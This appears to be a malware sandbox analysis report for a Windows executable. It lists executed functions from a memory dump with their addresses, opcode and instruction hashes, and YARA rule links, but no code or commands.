Instruction ID: 873f5724096192b45d8c5490d76e3156bdf3ac155fc6455cec84e14ca737edcb
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 8E21CD70624B0D8BCB05DF9998906EEBBE1EF88344F044A19E80AEB244D7B0D9148BC2

Analysis Process: InXlDTKncKkCk.exePID: 8096, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	13.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	196
Total number of Limit Nodes:	10

Executed Functions

Function 0514D060 Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f4b025257fef1c6f029a17eaff2f47ec954102d7e41f31caecee376ca567aa6
Instruction ID: 64f514937dd64be18cc23b0fa9dc70d1fa672af672a495245387df9063ba76e0
Opcode Fuzzy Hash: 5f4b025257fef1c6f029a17eaff2f47ec954102d7e41f31caecee376ca567aa6
Instruction Fuzzy Hash: D3B1A2B0E0422CCFDF24CFA9D8547EEBBB2BB49304F50A0A9D419A7281DB74594ACF41

Function 0514D070 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5ad831d99b0ceb82133ba128cf7402346a6c0edf2978fc36b4cf547d82a0e1b
Instruction ID: 58a80bc658cd0b961cfc0dc9edeef675dc4ccf60508ab6b8358ad6e36853b376
Opcode Fuzzy Hash: b5ad831d99b0ceb82133ba128cf7402346a6c0edf2978fc36b4cf547d82a0e1b
Instruction Fuzzy Hash: CAA1A2B0E0522DCFDF24CFA9D8547EEBBB2BB49304F50A0A9D419A7291DB74594ACF40

Function 05141170 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3876f0e69c5a682c31e7ad977951b081577101ee5c94efbc2602365a229d8bc5
Instruction ID: 8ef263c38f4f4fc503f806cf98614b16eac47c663a4eda80f512699348dbfa52
Opcode Fuzzy Hash: 3876f0e69c5a682c31e7ad977951b081577101ee5c94efbc2602365a229d8bc5
Instruction Fuzzy Hash: 73A1B370B002099FDB14DFA9C458AAFBBF6FF88210F148469E44AE7391DB349C41CBA5

Function 05147107 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a94ad1ef9550d5ed56068b8b41680eb9133bb238763c4053ebc11ee5991bab
Instruction ID: de6d1b0cf61817fc550687951e8419725ea0c9b0b70ae64da21bb627fb2461c6
Opcode Fuzzy Hash: d9a94ad1ef9550d5ed56068b8b41680eb9133bb238763c4053ebc11ee5991bab
Instruction Fuzzy Hash: A0A19374D05228CFEB64CF64D889BEDBBB1FB09305F14A4A9D44AA3281DB744AC6CF51

Function 0514714B Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a72baf15e05778ba01c9fc10228f44e17fd0929f3669c646878391dac6ce8c54
Instruction ID: 7ae6c74d2f9f2e73b87dde77d6eb7e7fda70741ff43bcbe1e635559ced9b3c26
Opcode Fuzzy Hash: a72baf15e05778ba01c9fc10228f44e17fd0929f3669c646878391dac6ce8c54
Instruction Fuzzy Hash: CD919474D05228CFEB64CF24D889BADBBB1FB09305F14A4A9D54AA3280CB745AC6CF51

Function 051415C0 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b4f472008d4f034d7d670f8b43be21e31f4f53ea69a52a2360b53e6fdc26950
Instruction ID: 2a1d3cabbef6ce8697a28256f0c85c73faaa6c0052aed094890e8494ff4df738
Opcode Fuzzy Hash: 1b4f472008d4f034d7d670f8b43be21e31f4f53ea69a52a2360b53e6fdc26950
Instruction Fuzzy Hash: 2E51BA307402019FDB28EB68C484BAEB7F6BF89604F144169E50ADB3A1CB70EC81CF50

Function 05146D34 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0731140fa944bc5821f8ecc09354f6cbc7d94d2135e8df4146272c4e04230bff
Instruction ID: 98b1d1ecb9d563ca3f8f18f2fb53b8bfbd8f5544c695c19cec13595aa47b9e6d
Opcode Fuzzy Hash: 0731140fa944bc5821f8ecc09354f6cbc7d94d2135e8df4146272c4e04230bff
Instruction Fuzzy Hash: 2151A171B002098FCB14DBB9D8489AFBBF6FFC4620B188529E456DB351EB30DC058BA0

Function 051415B0 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41da7c134b24f70f0c2d61cfaa8e73ced32a6b7fad41d41b9be6430621711b76
Instruction ID: 96d2e7e8fdd2155ba0e186d2213f3008afdefad8c789ad8df3b7741e5cc04e4f
Opcode Fuzzy Hash: 41da7c134b24f70f0c2d61cfaa8e73ced32a6b7fad41d41b9be6430621711b76
Instruction Fuzzy Hash: D441CC707402019FDB28EF68C584BAEB7F6BF89604F15516DD40A9B3A0DB71E881CF50

Function 05141162 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5ec955c32cd9d11f5d496ea4e5ce03827bdf3f63458c309f97a547f1cd8b969
Instruction ID: 8ded6dabb3d4620d07bd64be2f68548689ac6c60687001f8cea674c181d5cc2a
Opcode Fuzzy Hash: f5ec955c32cd9d11f5d496ea4e5ce03827bdf3f63458c309f97a547f1cd8b969
Instruction Fuzzy Hash: 5531E7B1B002059FE7489BE5C819B7F7BA7EBC8250F258469D446E7394DF348C4287A4

Function 0514852A Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615caaf479daa7c65edc92570ef2b0e2d61adf4c88fd250804387fe59b4ab9c4
Instruction ID: a0d35a0654a0480cbaa7d93320a903b6b1c7e075e97c07fe86843eba3243bc75
Opcode Fuzzy Hash: 615caaf479daa7c65edc92570ef2b0e2d61adf4c88fd250804387fe59b4ab9c4
Instruction Fuzzy Hash: 2331E1B6819BC4CFC3129B7995542417FF0FF8620274A99DBC4C1CBAA3DB39981AC712

Function 0514B31C Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04e4d207458df1cbaace5e7f0932c970a7558ae1087f9bb1d34fdfd2064e3a68
Instruction ID: 5ed61169033fad3b5a1afa2ac357b825e2babb605f97f9b6cedb70fee654db0c
Opcode Fuzzy Hash: 04e4d207458df1cbaace5e7f0932c970a7558ae1087f9bb1d34fdfd2064e3a68
Instruction Fuzzy Hash: 21312A75A00209AFCF14DFA9D884A9EBFF9FB48314F10842AE505E7210D774A951CFA4

Function 0514B3A8 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7847164f4c8f14ff417797f65b364ab163a9eea9eb070ab841e2e439bba4ec5
Instruction ID: 2d254a9e3ec3110ee4ed4fb7fdfb67e5e8477f672bc732bf6edfbea1e592c82b
Opcode Fuzzy Hash: c7847164f4c8f14ff417797f65b364ab163a9eea9eb070ab841e2e439bba4ec5
Instruction Fuzzy Hash: 75212472A083654FCB02DBB89C546FF7BB6AFC2520B0D456BE484C7242EB34CE0587A1

Function 0514AD10 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91229b28551fe408ed8a9e7849fc7405513bf305470c848a80fb6764ff6681e4
Instruction ID: a2e22fe027e1a66c181d6208cc4a801b940115e8f439c3efea86994198fa5f79
Opcode Fuzzy Hash: 91229b28551fe408ed8a9e7849fc7405513bf305470c848a80fb6764ff6681e4
Instruction Fuzzy Hash: 50314474E01209DFDB08DFA9E484AEDBBB6FF89301F11942AE415B7260DB705941CF50

Function 0514AD01 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 936430ff49d83c508b03fe34edc13d2788ef687175d3d83bd1a2fe9203fb6356
Instruction ID: d6d54273dc6d3be9806a8ba9c0657e693bb56049b474fa387d9695f5266ce4ca
Opcode Fuzzy Hash: 936430ff49d83c508b03fe34edc13d2788ef687175d3d83bd1a2fe9203fb6356
Instruction Fuzzy Hash: 73313674D41209DFDB18CFA9D844AEDBBB2FF89301F11902AE415B7250DB745941CF50

Function 0514217C Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa62e1a93d8297a3751ec1ca1f914499cc9fe2637edd1fc584e156f570774fe3
Instruction ID: 908e4de59f7eb00377b029014ecad731a06347bf0bfbcb53ee3e14882ed4c53b
Opcode Fuzzy Hash: aa62e1a93d8297a3751ec1ca1f914499cc9fe2637edd1fc584e156f570774fe3
Instruction Fuzzy Hash: CE311AB5E003089FDB14DFAAD484B9EFBF5FF88220F14842AD519E3240D774A9458F65

Function 051421A8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02899c579f0baf7cfc31e9e192f14472968b6144d29a3cb0ff4c94579195bab4
Instruction ID: fdbed0f2222f517e912f64ac5ed62fcb299d8c2227621c7886191040294f2eee
Opcode Fuzzy Hash: 02899c579f0baf7cfc31e9e192f14472968b6144d29a3cb0ff4c94579195bab4
Instruction Fuzzy Hash: F621B176E1020ADFDB059FA0D958A9EBFB2FF98304F058516F502BB254DF34A845CBA0

Function 0514B2E4 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3903224546e30004f133021d2f83db77c7d8ac8c33d9d137c8bb0306b3b060bb
Instruction ID: f42ff1333aa1806de1a5d59064bf28f0c9e12a9fde338cece25a268fcd1f678b
Opcode Fuzzy Hash: 3903224546e30004f133021d2f83db77c7d8ac8c33d9d137c8bb0306b3b060bb
Instruction Fuzzy Hash: B921F371B09348AFDB15DBB8C819B6D7BB9EF41204F1404EAE805D7282EF389D06DB52

Function 051421B8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d04487e37280cf9a7b3691f35d2869d664d910ca9ef213ddd4297e67cee1a3
Instruction ID: 16d4ed92cbe14812a213c52f63ba000cbe11f7aae3db10276c12f2b873f81dfe
Opcode Fuzzy Hash: 40d04487e37280cf9a7b3691f35d2869d664d910ca9ef213ddd4297e67cee1a3
Instruction Fuzzy Hash: 9421B235A10209EFDB159FA4D858E9EBFB6FF89304F048526F502BB254DF34A845CBA0

Function 0514B594 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cd9cb3b80c5e5c5b1935366b694de49f5feb854f57737c2ad15291fa2392aab
Instruction ID: 1c955c636aa87912f8fc7723e0f3a8491568da6879dfe3c9f663446961d3d545
Opcode Fuzzy Hash: 7cd9cb3b80c5e5c5b1935366b694de49f5feb854f57737c2ad15291fa2392aab
Instruction Fuzzy Hash: 8731FFB0C01218DFDB20DF99D988BCEBBF5BB08714F24901AE408BB280C7B99845CF90

Function 05148748 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2de41e9abc4c872335d95882fc7cec41ed8b8225360c9665d6e56ed6adbbafc
Instruction ID: e9d997f5ccf85fdf80ef2ae83a83f6509687c45e460495e6982c438bf0407f4f
Opcode Fuzzy Hash: c2de41e9abc4c872335d95882fc7cec41ed8b8225360c9665d6e56ed6adbbafc
Instruction Fuzzy Hash: 0511E675A04304BFE325EB18ECA1B2B77B5EB80712F41543AF046EB680DB749E41CE51

Function 0514B16C Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925e36a6357d453a7b3605ed69348dbb00d32b4d6e3f72b7682015525ac33e20
Instruction ID: 7a2ce69aa49afc9c5c852e5ba6bbeb87b02592c1a73cb8268a89a50190ff9b60
Opcode Fuzzy Hash: 925e36a6357d453a7b3605ed69348dbb00d32b4d6e3f72b7682015525ac33e20
Instruction Fuzzy Hash: 7D31FFB0D05318DFDB20DF9AD588B8EBBF5BB48714F24902AE408BB280D7B59845CF94

Function 05148758 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edbba74a7aa9413f01f6685d58e01708cb4074c33c2dbea6ef39a73491c1cc41
Instruction ID: 7607085ed31001574f2b4a85e830c64a6f14341d1b4f830be0fdc1f88795caca
Opcode Fuzzy Hash: edbba74a7aa9413f01f6685d58e01708cb4074c33c2dbea6ef39a73491c1cc41
Instruction Fuzzy Hash: DC11E971604304AFE325AB19EC55B2B7BB9EB40712F411436F046DB281C7746E00CE56

Function 0514B32C Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68520aeaf973f75ce06a016da787f78e9022a82bb8011bad4b8ec5e967f9d6f
Instruction ID: 097a25b366ba8493a30569e0ad25933702334c75b99779dfa00de0aeaacf0bee
Opcode Fuzzy Hash: c68520aeaf973f75ce06a016da787f78e9022a82bb8011bad4b8ec5e967f9d6f
Instruction Fuzzy Hash: 3C2103B590034D9FCB20DF9AD884ADEBBF4FB48320F10841AE919A7200D374A955CFA5

Function 05148671 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 087bd5d710abcf56a9caff8efc4bf24b56123d50a8498dd9c4e1d00ba2b8b045
Instruction ID: fca90195ead89368a84dc4fb246a13acbc0ebd469e137069831c9ed45e9a968f
Opcode Fuzzy Hash: 087bd5d710abcf56a9caff8efc4bf24b56123d50a8498dd9c4e1d00ba2b8b045
Instruction Fuzzy Hash: C711E172A0440CFBD794DF14F5416293FB5FB48305F22A5D9E486A6281EF3AC8A3CB85

Function 0514219C Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee8721e7d2b2890591e39cecbc62967278ddb871acb14284766c2f049099d719
Instruction ID: 5421237c97240f2fa0f9ef80c55e8a3eb1c91af1077b66b739535e33f35a220c
Opcode Fuzzy Hash: ee8721e7d2b2890591e39cecbc62967278ddb871acb14284766c2f049099d719
Instruction Fuzzy Hash: 7211F3B5D006099FDB20DFAAD444B9EFBF4EB88220F10851AD459A7210D378A945CFA5

Function 05143020 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7259d6c51cdd041034a5604f9e513b21df37e46979e0ccc4a161a81bb796258
Instruction ID: b069e0a07e7f842b1e1062e919bafc6bbb0cd069e9e281d011db464b09ef7ebe
Opcode Fuzzy Hash: a7259d6c51cdd041034a5604f9e513b21df37e46979e0ccc4a161a81bb796258
Instruction Fuzzy Hash: 5D11F0B5C006098FDB10DFAAC544B9EFBF4BF48220F14851AD469A7250D378A545CFA0

Function 0514218C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae46b4032bf93ef834fa30154019537fa784b04a90720b2e88ba6a89e05cb715
Instruction ID: fb3a6158d3fa43dbc1841f606276546765c43838296634633661ac1489f07a6b
Opcode Fuzzy Hash: ae46b4032bf93ef834fa30154019537fa784b04a90720b2e88ba6a89e05cb715
Instruction Fuzzy Hash: A4F0F472B043086BDB18DAB8E8147AE7BFADF84260F08886BD40DD3341DE3588414B41

Function 05148680 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b805bc7c75f20ba21159d687aca03eacd13c9bb9a6054a8208b7e2eb202b891
Instruction ID: 9141b776bd62dd1feada5ca3dbc0b258ef03ccbee1c061db7d666e216c9df149
Opcode Fuzzy Hash: 1b805bc7c75f20ba21159d687aca03eacd13c9bb9a6054a8208b7e2eb202b891
Instruction Fuzzy Hash: 4F016D71A14508EBD794DF14F5456287FB1FB48305B2264D9E48AA6281EF36C8A3CB85

Function 05144228 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9664db1ae2cf85b077cd0d1b42494dc0720ca48f5c6aeafe96fac598c9eed04
Instruction ID: e9fd94f9e8c15eb876b6c1b113a882b87e2cb7dddcb2224ce2a8787cea1382e4
Opcode Fuzzy Hash: a9664db1ae2cf85b077cd0d1b42494dc0720ca48f5c6aeafe96fac598c9eed04
Instruction Fuzzy Hash: 561133B59007098FDB10DF99D584BDEFBF4BB48220F10841AD519A7340D378A944CFA1

Function 05145440 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c090f27db845269628e2d32ebe9a83b2cbff9b0daeb699f45b906c2bc8c135da
Instruction ID: 97ef1abb05ba360995b4c725bb38c591d9a7507f3754802dfb70f263a6b3db2a
Opcode Fuzzy Hash: c090f27db845269628e2d32ebe9a83b2cbff9b0daeb699f45b906c2bc8c135da
Instruction Fuzzy Hash: F301C070E01209EFDB40EFE4E855A8D7FB1FB44201F1045AAE801E7242DB385A45CB55

Function 051485D8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a3a98fb49d304eb433547cb6dd5515b0087753bf6b36575c9f40e17a057e709
Instruction ID: 288fe2137f04c5ada6df928011ef4edd0ddcdaf8eb053a16dfcb2fd3ce660fde
Opcode Fuzzy Hash: 9a3a98fb49d304eb433547cb6dd5515b0087753bf6b36575c9f40e17a057e709
Instruction Fuzzy Hash: 55115771900F08CBC324CF2AE285906BFF0FF8871074199D9E0CA97A24EB35E425CB44

Function 05143301 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b253cfc2c2d5a5fbc54e0551622b2094ed486718e81d38304a889a881cabc7
Instruction ID: 6463b5c83f358f9a53d14a64e6a0fa205d8467aa431ae30f7adc4241ff049991
Opcode Fuzzy Hash: c8b253cfc2c2d5a5fbc54e0551622b2094ed486718e81d38304a889a881cabc7
Instruction Fuzzy Hash: 95F0C872B402146BCF06F7A4E8545FF77769B88110F001029E504A7382DB380E4ACB91

Function 051475A8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9615f2bd7454a7c7f33f150c6f61b694691f71b4aefeee2d374f250e554bc79
Instruction ID: 0da70961cf5b2484b8c0cfb3fb7bcef1d5a2d2ff604138a4e1f6825002b4921a
Opcode Fuzzy Hash: f9615f2bd7454a7c7f33f150c6f61b694691f71b4aefeee2d374f250e554bc79
Instruction Fuzzy Hash: BC119F7494022ACFEB64DFA4C954BADBBB2BB49301F1081A9D809A7684EB345A85DF50

Function 05143310 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b43845954b830b697f80839f150c1805417a3b519e658b856995e4302234aea
Instruction ID: d3c7d1a96e8f3ca4256bed29837ad148fab08ffb506422fb098be80c356ee1e9
Opcode Fuzzy Hash: 7b43845954b830b697f80839f150c1805417a3b519e658b856995e4302234aea
Instruction Fuzzy Hash: 4CF09671B401186B8F15B7A8D8545FEBABAABC8510F001029E509A7341DB390A46CBE5

Function 051485E8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aadf29a336fdb0f358379b7906e0fcb5b6e9323d85f5236e4a54d41b15e9a891
Instruction ID: dc6161845cf950ea71d69af6293e55046778c1a23ce4eb7df8a8d53e5b145612
Opcode Fuzzy Hash: aadf29a336fdb0f358379b7906e0fcb5b6e9323d85f5236e4a54d41b15e9a891
Instruction Fuzzy Hash: 2D010271910F18CFC324DF1AE285806BFF0FF8871078199DAE4CA97A64EB75A465CB85

Function 05144640 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_5140000_InXlDTKncKkCk.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b8d1cab5e92890bd9d8637263e2cb798520b611481f56dc38105fc5c49ecf0
Instruction ID: 828c655ab67ed18069b08b3b9e0fd49b9b260cadfa4ff282f25efa77f17c8f3d
Opcode Fuzzy Hash: b6b8d1cab5e92890bd9d8637263e2cb798520b611481f56dc38105fc5c49ecf0
Instruction Fuzzy Hash: 82F0C231B053084FDB145B75E85896F3BA6EBC0721B00886DE446D7380DE349802CB95

Function 05144650 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1492281730.0000000005140000.00000040.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: false

